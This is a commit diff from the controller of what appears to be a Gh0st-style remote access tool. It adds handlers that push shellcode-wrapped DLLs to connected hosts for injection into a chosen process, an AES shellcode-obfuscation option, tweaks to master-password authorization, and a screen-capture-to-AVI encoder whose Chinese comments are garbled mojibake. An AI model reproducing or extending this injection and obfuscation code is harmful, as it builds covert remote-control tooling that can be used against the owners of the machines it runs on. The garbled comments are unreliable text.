if (GetPwdHash() != masterHash) {
SubMenu->DeleteMenu(ID_TOOL_GEN_MASTER, MF_BYCOMMAND);
}
SubMenu = m_MainMenu.GetSubMenu(2);
@@ -1384,10 +1391,10 @@ void CMy2015RemoteDlg::OnTimer(UINT_PTR nIDEvent)
Mprintf(">>> Timer is killed <<<\n");
KillTimer(nIDEvent);
std::string masterHash = GetMasterHash();
if (GetPwdHash() == masterHash) {
if (GetPwdHash() != masterHash)
THIS_CFG.SetStr("settings", "superAdmin", m_superPass);
if (GetPwdHash() == masterHash)
THIS_CFG.SetStr("settings", "HMAC", genHMAC(masterHash, m_superPass));
}
return;
}
PostMessageA(WM_PASSWORDCHECK);
@@ -1531,7 +1538,7 @@ void CMy2015RemoteDlg::OnNMRClickOnline(NMHDR *pNMHDR, LRESULT *pResult)
Menu.SetMenuItemBitmaps(ID_ONLINE_REGROUP, MF_BYCOMMAND, &m_bmOnline[17], &m_bmOnline[17]);
std::string masterHash(GetMasterHash());
if (GetPwdHash() != masterHash || m_superPass.empty()) {
if (GetPwdHash() != masterHash) {
Menu.DeleteMenu(ID_ONLINE_AUTHORIZE, MF_BYCOMMAND);
Menu.DeleteMenu(ID_ONLINE_UNAUTHORIZE, MF_BYCOMMAND);
}
@@ -2224,7 +2231,7 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
}
case CMD_EXECUTE_DLL: { // 请求DLL执行代码【L】
DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1);
if (std::string(info->Name) == "TinyRun.dll") {
if (std::string(info->Name) == TINY_DLL_NAME) {
auto tinyRun = ReadTinyRunDll(info->Pid);
Buffer* buf = tinyRun->Data;
ContextObject->Send2Client(buf->Buf(), tinyRun->Data->length());
@@ -2238,6 +2245,12 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
ContextObject->Send2Client(dll->Data->Buf(), dll->Data->length());
break;
}
}
auto dll = ReadPluginDll(PluginPath() + "\\" + info->Name, { SHELLCODE, 0, CALLTYPE_DEFAULT, {}, {}, info->Pid, info->Is32Bit });
if (dll) {
Buffer* buf = dll->Data;
ContextObject->Send2Client(buf->Buf(), dll->Data->length());
SAFE_DELETE(dll);
}
Sleep(20);
break;
@@ -2675,7 +2688,8 @@ void CMy2015RemoteDlg::OnToolAuth()
dlg.m_sUserPwd = m_superPass.c_str();
dlg.DoModal();
if (!dlg.m_sUserPwd.IsEmpty()) {
if (!dlg.m_sUserPwd.IsEmpty() && !dlg.m_sPassword.IsEmpty()) {
m_superPass = dlg.m_sUserPwd;
if (deviceID.c_str() == dlg.m_sDeviceID) {
m_nMaxConnection = dlg.m_nHostNum;
@@ -3324,6 +3338,12 @@ void CMy2015RemoteDlg::OnObfsShellcode()
shellcode_process(&obfs);
}
void CMy2015RemoteDlg::OnShellcodeAesCArray()
{
ObfsAes obfs;
shellcode_process(&obfs);
}
void CMy2015RemoteDlg::OnToolGenShellcodeBin()
{
@@ -3841,7 +3861,7 @@ context* CMy2015RemoteDlg::FindHostByIP(const std::string& ip) {
EnterCriticalSection(&m_cs);
for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
context* ContextObject = *i;
if (ContextObject->GetClientData(ONLINELIST_IP) == clientIP) {
if (ContextObject->GetClientData(ONLINELIST_IP) == clientIP || ContextObject->GetAdditionalData(RES_CLIENT_PUBIP) == clientIP) {
LeaveCriticalSection(&m_cs);
return ContextObject;
}
@@ -3860,10 +3880,36 @@ LRESULT CMy2015RemoteDlg::InjectShellcode(WPARAM wParam, LPARAM lParam){
void CMy2015RemoteDlg::InjectTinyRunDll(const std::string& ip, int pid){
auto ctx = FindHostByIP(ip);
if (ctx == NULL)return;
if (ctx == NULL) {
MessageBoxA(CString("没有找到在线主机: ") + ip.c_str(), "提示", MB_ICONINFORMATION);
return;
}
auto tinyRun = ReadTinyRunDll(pid);
Buffer* buf = tinyRun->Data;
ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
SAFE_DELETE(tinyRun);
}
LRESULT CMy2015RemoteDlg::AntiBlackScreen(WPARAM wParam, LPARAM lParam) {
char* ip = (char*)wParam;
std::string host(ip);
std::string arch = ip + 256;
int pid = lParam;
auto ctx = FindHostByIP(ip);
delete ip;
if (ctx == NULL) {
MessageBoxA(CString("没有找到在线主机: ") + host.c_str(), "提示", MB_ICONINFORMATION);
return S_FALSE;
}
bool is32Bit = arch == "x86";
std::string path = PluginPath() + "\\" + (is32Bit ? "AntiBlackScreen_x86.dll" : "AntiBlackScreen_x64.dll");
auto antiBlackScreen = ReadPluginDll(path, { SHELLCODE, 0, CALLTYPE_DEFAULT, {}, {}, pid, is32Bit });
if (antiBlackScreen) {
Buffer* buf = antiBlackScreen->Data;
ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
SAFE_DELETE(antiBlackScreen);
}else
MessageBoxA(CString("没有反黑屏插件: ") + path.c_str(), "提示", MB_ICONINFORMATION);
return S_OK;
}

2
server/2015Remote/2015RemoteDlg.h
View File

@@ -300,6 +300,7 @@ public:
afx_msg LRESULT OnOpenDrawingBoard(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT InjectShellcode(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT AntiBlackScreen(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT ShareClient(WPARAM wParam, LPARAM lParam);
LRESULT assignFunction(WPARAM wParam, LPARAM lParam, BOOL all);
afx_msg LRESULT AssignClient(WPARAM wParam, LPARAM lParam);
@@ -355,4 +356,5 @@ public:
afx_msg void OnShellcodeAesBin();
afx_msg void OnShellcodeTestAesBin();
afx_msg void OnToolReloadPlugins();
afx_msg void OnShellcodeAesCArray();
};

2
server/2015Remote/2015Remote_vs2015.vcxproj
View File

@@ -266,6 +266,7 @@
<ClInclude Include="2015RemoteDlg.h" />
<ClInclude Include="adapter.h" />
<ClInclude Include="AudioDlg.h" />
<ClInclude Include="Bmp2Video.h" />
<ClInclude Include="Buffer.h" />
<ClInclude Include="BuildDlg.h" />
<ClInclude Include="CDrawingBoard.h" />
@@ -339,6 +340,7 @@
<ClCompile Include="2015Remote.cpp" />
<ClCompile Include="2015RemoteDlg.cpp" />
<ClCompile Include="AudioDlg.cpp" />
<ClCompile Include="Bmp2Video.cpp" />
<ClCompile Include="Buffer.cpp" />
<ClCompile Include="BuildDlg.cpp" />
<ClCompile Include="CDrawingBoard.cpp" />

2
server/2015Remote/2015Remote_vs2015.vcxproj.filters
View File

@@ -56,6 +56,7 @@
<ClCompile Include="CWalletDlg.cpp" />
<ClCompile Include="CRcEditDlg.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="Bmp2Video.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\client\Audio.h" />
@@ -125,6 +126,7 @@
<ClInclude Include="CRcEditDlg.h" />
<ClInclude Include="..\..\common\obfs.h" />
<ClInclude Include="..\..\common\file_upload.h" />
<ClInclude Include="Bmp2Video.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="2015Remote.rc" />

607
server/2015Remote/Bmp2Video.cpp Normal file
View File

@@ -0,0 +1,607 @@
#include "stdafx.h"
#include "Bmp2Video.h"
#define USE_JPEG 0
#if USE_JPEG
#include "common/turbojpeg.h"
#ifdef _WIN64
#ifdef _DEBUG
#pragma comment(lib, "jpeg/turbojpeg_64_d.lib")
#else
#pragma comment(lib, "jpeg/turbojpeg_64_d.lib")
#endif
#else
#ifdef _DEBUG
#pragma comment(lib, "jpeg/turbojpeg_32_d.lib")
#else
#pragma comment(lib, "jpeg/turbojpeg_32_d.lib")
#endif
#endif
#else
#define tjFree free
#endif
AVISTREAMINFO CBmpToAvi::m_si = {};
CBmpToAvi::CBmpToAvi()
{
m_nFrames = 0;
m_pfile = NULL;
m_pavi = NULL;
m_hic = NULL;
AVIFileInit();
}
CBmpToAvi::~CBmpToAvi()
{
Close();
AVIFileExit();
}
int CBmpToAvi::Open(LPCTSTR szFile, LPBITMAPINFO lpbmi, int rate, FCCHandler h)
{
if (szFile == NULL)
return ERR_INVALID_PARAM;
m_nFrames = 0;
if (AVIFileOpen(&m_pfile, szFile, OF_WRITE | OF_CREATE, NULL))
return ERR_INTERNAL;
m_fccHandler = h;
m_si.fccType = streamtypeVIDEO;
m_si.fccHandler = m_fccHandler;
m_si.dwScale = 1;
m_si.dwRate = rate;
m_width = lpbmi->bmiHeader.biWidth;
m_height = lpbmi->bmiHeader.biHeight;
SetRect(&m_si.rcFrame, 0, 0, m_width, m_height);
m_bitCount = lpbmi->bmiHeader.biBitCount;
if (m_bitCount != 24 && m_bitCount != 32) {
AVIFileRelease(m_pfile);
m_pfile = NULL;
return ERR_NOT_SUPPORT;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȷ<EFBFBD><C8B7>BITMAPINFO<46><4F><EFBFBD><EFBFBD>MJPEG
BITMAPINFO bmiFormat = *lpbmi;
if (m_fccHandler == ENCODER_H264) {
// <20><><EFBFBD><EFBFBD>H.264ѹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
m_hic = ICOpen(ICTYPE_VIDEO, mmioFOURCC('X', '2', '6', '4'), ICMODE_COMPRESS);
if (!m_hic) {
AVIFileRelease(m_pfile);
m_pfile = NULL;
return ERR_NO_ENCODER;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽ<EFBFBD><CABD>δѹ<CEB4><D1B9><EFBFBD><EFBFBD>24λBMP<4D><50>
BITMAPINFOHEADER inputFormat = { 0 };
inputFormat.biSize = sizeof(BITMAPINFOHEADER);
inputFormat.biWidth = m_width;
inputFormat.biHeight = m_height;
inputFormat.biPlanes = 1;
inputFormat.biBitCount = 24;
inputFormat.biCompression = BI_RGB;
inputFormat.biSizeImage = m_width * m_height * 3;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽ<EFBFBD><CABD>H.264ѹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
BITMAPINFOHEADER outputFormat = inputFormat;
outputFormat.biCompression = mmioFOURCC('X', '2', '6', '4');
// <20><>ѯѹ<D1AF><D1B9><EFBFBD><EFBFBD><EFBFBD>ܷ<EFBFBD><DCB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽ
DWORD result = ICCompressQuery(m_hic, &inputFormat, &outputFormat);
if (result != ICERR_OK) {
ICClose(m_hic);
m_hic = NULL;
AVIFileRelease(m_pfile);
m_pfile = NULL;
Mprintf("ICCompressQuery failed: %d\n", result);
return ERR_NO_ENCODER;
}
// <20><>ʼѹ<CABC><D1B9>
result = ICCompressBegin(m_hic, &inputFormat, &outputFormat);
if (result != ICERR_OK) {
ICClose(m_hic);
m_hic = NULL;
AVIFileRelease(m_pfile);
m_pfile = NULL;
Mprintf("ICCompressBegin failed: %d\n", result);
return ERR_NO_ENCODER;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
m_quality = 7500;
// AVI<56><49><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
bmiFormat.bmiHeader.biCompression = mmioFOURCC('X', '2', '6', '4');
bmiFormat.bmiHeader.biBitCount = 24;
bmiFormat.bmiHeader.biSizeImage = m_width * m_height * 3;
m_si.dwSuggestedBufferSize = bmiFormat.bmiHeader.biSizeImage;
}
else if (m_fccHandler == ENCODER_MJPEG) {
// MJPEG<45><47>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
bmiFormat.bmiHeader.biCompression = mmioFOURCC('M', 'J', 'P', 'G');
bmiFormat.bmiHeader.biBitCount = 24; // MJPEG<45><47><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>24λ
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȷ<EFBFBD><C8B7>ͼ<EFBFBD><CDBC><EFBFBD><EFBFBD>С
bmiFormat.bmiHeader.biSizeImage = m_width * m_height * 3;
m_si.dwSuggestedBufferSize = bmiFormat.bmiHeader.biSizeImage * 2; // Ԥ<><D4A4><EFBFBD><EFBFBD>ռ<EFBFBD>
m_quality = 85; // Ĭ<><C4AC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
}
else {
m_si.dwSuggestedBufferSize = lpbmi->bmiHeader.biSizeImage;
}
if (AVIFileCreateStream(m_pfile, &m_pavi, &m_si)) {
if (m_hic) {
ICCompressEnd(m_hic);
ICClose(m_hic);
m_hic = NULL;
}
AVIFileRelease(m_pfile);
m_pfile = NULL;
return ERR_INTERNAL;
}
if (AVIStreamSetFormat(m_pavi, 0, &bmiFormat, sizeof(BITMAPINFOHEADER))) {
if (m_hic) {
ICCompressEnd(m_hic);
ICClose(m_hic);
m_hic = NULL;
}
AVIStreamRelease(m_pavi);
m_pavi = NULL;
AVIFileRelease(m_pfile);
m_pfile = NULL;
return ERR_INTERNAL;
}
return 0;
}
#if USE_JPEG
// <20>Ż<EFBFBD><C5BB><EFBFBD>BMP<4D><50>JPEGת<47><D7AA>
bool BmpToJpeg(LPVOID lpBuffer, int width, int height, int quality, unsigned char** jpegData, unsigned long* jpegSize) {
if (!lpBuffer || !jpegData || !jpegSize) {
return false;
}
tjhandle jpegCompressor = tjInitCompress();
if (!jpegCompressor) {
Mprintf("TurboJPEG initialization failed: %s\n", tjGetErrorStr());
return false;
}
// ȷ<><C8B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ں<EFBFBD><DABA><EFBFBD><EFBFBD><EFBFBD>Χ<EFBFBD><CEA7>
if (quality < 1) quality = 85;
if (quality > 100) quality = 100;
int pitch = width * 3; // BGR24<32><34>ʽ<EFBFBD><CABD>ÿ<EFBFBD><C3BF><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD>
// <20><>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC>ΪNULL<4C><4C><EFBFBD><EFBFBD>TurboJPEG<45>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>
*jpegData = NULL;
*jpegSize = 0;
// ȥ<><C8A5>TJFLAG_NOREALLOC<4F><43>־<EFBFBD><D6BE><EFBFBD><EFBFBD>TurboJPEG<45>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>
int tjError = tjCompress2(
jpegCompressor,
(unsigned char*)lpBuffer,
width,
pitch, // ÿ<><C3BF><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD>
height,
TJPF_BGR, // BGR<47><52>ʽ
jpegData, // TurboJPEG<45><47><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD>
jpegSize,
TJSAMP_422, // 4:2:2ɫ<32><C9AB><EFBFBD>Ӳ<EFBFBD><D3B2><EFBFBD>
quality, // ѹ<><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
0 // <20><>ʹ<EFBFBD><CAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>־
);
if (tjError != 0) {
Mprintf("TurboJPEG compression failed: %s\n", tjGetErrorStr2(jpegCompressor));
tjDestroy(jpegCompressor);
return false;
}
tjDestroy(jpegCompressor);
// <20><>֤<EFBFBD><D6A4><EFBFBD><EFBFBD>
if (*jpegData == NULL || *jpegSize == 0) {
Mprintf("JPEG compression produced no data\n");
return false;
}
Mprintf("JPEG compression successful: %lu bytes\n", *jpegSize);
return true;
}
#else
#include <windows.h>
#include <gdiplus.h>
#include <shlwapi.h>
#pragma comment(lib, "gdiplus.lib")
#pragma comment(lib, "shlwapi.lib")
using namespace Gdiplus;
// ==================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ====================
// <20><>ȡ JPEG <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> CLSID
int GetEncoderClsid(const WCHAR* format, CLSID* pClsid)
{
UINT num = 0;
UINT size = 0;
GetImageEncodersSize(&num, &size);
if (size == 0) return -1;
ImageCodecInfo* pImageCodecInfo = (ImageCodecInfo*)malloc(size);
if (pImageCodecInfo == NULL) return -1;
GetImageEncoders(num, size, pImageCodecInfo);
for (UINT j = 0; j < num; ++j) {
if (wcscmp(pImageCodecInfo[j].MimeType, format) == 0) {
*pClsid = pImageCodecInfo[j].Clsid;
free(pImageCodecInfo);
return j;
}
}
free(pImageCodecInfo);
return -1;
}
// ==================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ====================
bool BmpToJpeg(LPVOID lpBuffer, int width, int height, int quality,
unsigned char** jpegData, unsigned long* jpegSize)
{
if (!lpBuffer || !jpegData || !jpegSize || width <= 0 || height <= 0) {
return false;
}
// <20><><EFBFBD><EFBFBD> DIB <20><><EFBFBD><EFBFBD><EFBFBD>ֽ<EFBFBD><D6BD><EFBFBD><EFBFBD><EFBFBD>4<EFBFBD>ֽڶ<D6BD><DAB6>
int rowSize = ((width * 3 + 3) / 4) * 4;
// <20><><EFBFBD><EFBFBD> Bitmap <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>24λ BGR <20><>ʽ<EFBFBD><CABD>
Bitmap* bitmap = new Bitmap(width, height, PixelFormat24bppRGB);
if (!bitmap || bitmap->GetLastStatus() != Ok) {
if (bitmap) delete bitmap;
return false;
}
// <20><><EFBFBD><EFBFBD> Bitmap <20><>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
BitmapData bitmapData;
Rect rect(0, 0, width, height);
Status status = bitmap->LockBits(&rect, ImageLockModeWrite,
PixelFormat24bppRGB, &bitmapData);
if (status != Ok) {
delete bitmap;
return false;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݣ<EFBFBD>ע<EFBFBD>⣺DIB <20>ǵײ<C7B5><D7B2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA>ת<EFBFBD><D7AA>
BYTE* srcData = (BYTE*)lpBuffer;
BYTE* dstData = (BYTE*)bitmapData.Scan0;
for (int y = 0; y < height; y++) {
// DIB <20>Ǵӵײ<D3B5><D7B2><EFBFBD>ʼ<EFBFBD>ģ<EFBFBD><C4A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA>ת
BYTE* srcRow = srcData + (height - 1 - y) * rowSize;
BYTE* dstRow = dstData + y * bitmapData.Stride;
memcpy(dstRow, srcRow, width * 3);
}
bitmap->UnlockBits(&bitmapData);
// <20><>ȡ JPEG <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
CLSID jpegClsid;
if (GetEncoderClsid(L"image/jpeg", &jpegClsid) < 0) {
delete bitmap;
return false;
}
// <20><><EFBFBD><EFBFBD> JPEG <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
EncoderParameters encoderParams;
encoderParams.Count = 1;
encoderParams.Parameter[0].Guid = EncoderQuality;
encoderParams.Parameter[0].Type = EncoderParameterValueTypeLong;
encoderParams.Parameter[0].NumberOfValues = 1;
ULONG qualityValue = (ULONG)quality;
encoderParams.Parameter[0].Value = &qualityValue;
// <20><><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڱ<EFBFBD><DAB1><EFBFBD> JPEG
IStream* stream = NULL;
HRESULT hr = CreateStreamOnHGlobal(NULL, TRUE, &stream);
if (FAILED(hr)) {
delete bitmap;
return false;
}
// <20><><EFBFBD><EFBFBD>Ϊ JPEG
status = bitmap->Save(stream, &jpegClsid, &encoderParams);
delete bitmap;
if (status != Ok) {
stream->Release();
return false;
}
// <20><>ȡ JPEG <20><><EFBFBD><EFBFBD>
HGLOBAL hMem = NULL;
hr = GetHGlobalFromStream(stream, &hMem);
if (FAILED(hr)) {
stream->Release();
return false;
}
SIZE_T memSize = GlobalSize(hMem);
if (memSize == 0) {
stream->Release();
return false;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
*jpegSize = (unsigned long)memSize;
*jpegData = new unsigned char[*jpegSize];
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
void* pMem = GlobalLock(hMem);
if (pMem) {
memcpy(*jpegData, pMem, *jpegSize);
GlobalUnlock(hMem);
}
else {
delete[] * jpegData;
*jpegData = NULL;
stream->Release();
return false;
}
stream->Release();
return true;
}
// ==================== GDI+ <20><>ʼ<EFBFBD><CABC>/<2F><><EFBFBD><EFBFBD> ====================
class GdiplusManager {
private:
ULONG_PTR gdiplusToken;
bool initialized;
public:
GdiplusManager() : gdiplusToken(0), initialized(false) {
GdiplusStartupInput gdiplusStartupInput;
if (GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL) == Ok) {
initialized = true;
}
}
~GdiplusManager() {
if (initialized) {
GdiplusShutdown(gdiplusToken);
}
}
bool IsInitialized() const { return initialized; }
};
// ȫ<>ֶ<EFBFBD><D6B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
static GdiplusManager g_gdiplusManager;
#endif
// <20><>ȷ<EFBFBD><C8B7>32λת24λת<CEBB><D7AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ת<EFBFBD><D7AA>
unsigned char* ConvertScreenshot32to24(unsigned char* p32bitBmp, int width, int height)
{
// <20><><EFBFBD><EFBFBD>BMP<4D><50>ʵ<EFBFBD><CAB5><EFBFBD>д<EFBFBD>С<EFBFBD><D0A1>4<EFBFBD>ֽڶ<D6BD><DAB6>
int srcRowSize = ((width * 32 + 31) / 32) * 4;
int dstRowSize = width * 3; // Ŀ<><C4BF><EFBFBD>ǽ<EFBFBD><C7BD>յ<EFBFBD>24λ
unsigned char* p24bitBmp = (unsigned char*)malloc(dstRowSize * height);
if (!p24bitBmp) return nullptr;
for (int y = 0; y < height; y++)
{
// BMP<4D>Ǵ<EFBFBD><C7B4>µ<EFBFBD><C2B5>ϴ洢<CFB4><E6B4A2><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA>ת
unsigned char* src = p32bitBmp + (height - 1 - y) * srcRowSize;
unsigned char* dst = p24bitBmp + y * dstRowSize;
for (int x = 0; x < width; x++)
{
dst[x * 3 + 0] = src[x * 4 + 0]; // B
dst[x * 3 + 1] = src[x * 4 + 1]; // G
dst[x * 3 + 2] = src[x * 4 + 2]; // R
// <20><><EFBFBD><EFBFBD>Alphaͨ<61><CDA8>
}
}
return p24bitBmp;
}
// 24λBMP<4D><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ת<EFBFBD><D7AA>ȥ<EFBFBD><C8A5><EFBFBD>
unsigned char* Process24BitBmp(unsigned char* lpBuffer, int width, int height)
{
// BMP 24λ<34>д<EFBFBD>С<EFBFBD><D0A1>4<EFBFBD>ֽڶ<D6BD><DAB6>
int srcRowSize = ((width * 24 + 31) / 32) * 4;
int dstRowSize = width * 3; // <20><><EFBFBD>ո<EFBFBD>ʽ
unsigned char* processed = (unsigned char*)malloc(dstRowSize * height);
if (!processed) return nullptr;
for (int y = 0; y < height; y++)
{
// <20><>ת<EFBFBD><D7AA>ȥ<EFBFBD><C8A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֽ<EFBFBD>
unsigned char* src = lpBuffer + (height - 1 - y) * srcRowSize;
unsigned char* dst = processed + y * dstRowSize;
memcpy(dst, src, dstRowSize);
}
return processed;
}
bool CBmpToAvi::Write(unsigned char* lpBuffer)
{
if (m_pfile == NULL || m_pavi == NULL || lpBuffer == NULL)
return false;
unsigned char* writeData = nullptr;
unsigned long writeSize = 0;
bool needFree = false;
switch (m_fccHandler)
{
case ENCODER_BMP:
writeData = lpBuffer;
writeSize = m_si.dwSuggestedBufferSize;
break;
case ENCODER_H264: {
unsigned char* processedBuffer = nullptr;
if (m_bitCount == 32) {
processedBuffer = ConvertScreenshot32to24(lpBuffer, m_width, m_height);
}
else if (m_bitCount == 24) {
processedBuffer = Process24BitBmp(lpBuffer, m_width, m_height);
}
if (!processedBuffer) {
Mprintf("Failed to process buffer\n");
return false;
}
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ȷ<EFBFBD>ĸ<EFBFBD>ʽͷ
BITMAPINFOHEADER inputHeader = { 0 };
inputHeader.biSize = sizeof(BITMAPINFOHEADER);
inputHeader.biWidth = m_width;
inputHeader.biHeight = -m_height;
inputHeader.biPlanes = 1;
inputHeader.biBitCount = 24;
inputHeader.biCompression = BI_RGB;
inputHeader.biSizeImage = m_width * m_height * 3;
BITMAPINFOHEADER outputHeader = inputHeader;
outputHeader.biCompression = mmioFOURCC('X', '2', '6', '4');
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
DWORD maxCompressedSize = m_width * m_height * 3;
unsigned char* compressedData = (unsigned char*)malloc(maxCompressedSize);
if (!compressedData) {
free(processedBuffer);
Mprintf("Failed to allocate compression buffer\n");
return false;
}
DWORD flags = 0;
// <20><>ȷ<EFBFBD><C8B7><EFBFBD><EFBFBD>ICCompress
DWORD result = ICCompress(
m_hic, // ѹ<><D1B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
0, // <20><>־<EFBFBD><D6BE>0=<3D>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ؼ<EFBFBD>֡<EFBFBD><D6A1>
&outputHeader, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽͷ
compressedData, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
&inputHeader, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽͷ
processedBuffer, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
NULL, // ckid
&flags, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>־
m_nFrames, // ֡<><D6A1>
0, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С<EFBFBD><D0A1>0=<3D>Զ<EFBFBD><D4B6><EFBFBD>
m_quality, // <20><><EFBFBD><EFBFBD>
NULL, // ǰһ֡<D2BB><D6A1>ʽͷ
NULL // ǰһ֡<D2BB><D6A1><EFBFBD><EFBFBD>
);
if (result != ICERR_OK) {
free(compressedData);
free(processedBuffer);
Mprintf("ICCompress failed: %d\n", result);
return false;
}
// ʵ<><CAB5>ѹ<EFBFBD><D1B9><EFBFBD><EFBFBD>С<EFBFBD><D0A1>outputHeader.biSizeImage<67><65>
writeData = compressedData;
writeSize = outputHeader.biSizeImage;
needFree = true;
free(processedBuffer);
break;
}
case ENCODER_MJPEG: {
unsigned char* processedBuffer = nullptr;
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͬλ<CDAC><CEBB><EFBFBD><EFBFBD>
if (m_bitCount == 32) {
processedBuffer = ConvertScreenshot32to24(lpBuffer, m_width, m_height);
}
else if (m_bitCount == 24) {
processedBuffer = Process24BitBmp(lpBuffer, m_width, m_height);
}
if (!processedBuffer) {
return false;
}
// ѹ<><D1B9>ΪJPEG
if (!BmpToJpeg(processedBuffer, m_width, m_height, m_quality, &writeData, &writeSize)) {
free(processedBuffer);
Mprintf("Failed to compress JPEG\n");
return false;
}
free(processedBuffer);
needFree = true;
break;
}
default:
return false;
}
// д<><D0B4>AVI<56><49>
LONG bytesWritten = 0;
LONG samplesWritten = 0;
HRESULT hr = AVIStreamWrite(m_pavi, m_nFrames, 1,
writeData, writeSize,
AVIIF_KEYFRAME,
&samplesWritten, &bytesWritten);
if (needFree && writeData) {
if (m_fccHandler == ENCODER_MJPEG) {
tjFree(writeData);
}
else {
free(writeData);
}
}
if (hr != AVIERR_OK) {
Mprintf("AVIStreamWrite failed: 0x%08X\n", hr);
return false;
}
m_nFrames++;
return true;
}
void CBmpToAvi::Close()
{
if (m_hic) {
ICCompressEnd(m_hic);
ICClose(m_hic);
m_hic = NULL;
}
if (m_pavi) {
AVIStreamRelease(m_pavi);
m_pavi = NULL;
}
if (m_pfile) {
AVIFileRelease(m_pfile);
m_pfile = NULL;
}
m_nFrames = 0;
}

55
server/2015Remote/Bmp2Video.h Normal file
View File

@@ -0,0 +1,55 @@
#pragma once
#include <Vfw.h>
#pragma comment(lib,"Vfw32.lib")
#define ERR_INVALID_PARAM 1
#define ERR_NO_ENCODER 2
#define ERR_INTERNAL 3
#define ERR_NOT_SUPPORT 4
enum FCCHandler {
ENCODER_BMP = BI_RGB,
ENCODER_MJPEG = mmioFOURCC('M', 'J', 'P', 'G'),
// <20><>װx264vfw<66><77><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: https://sourceforge.net/projects/x264vfw/
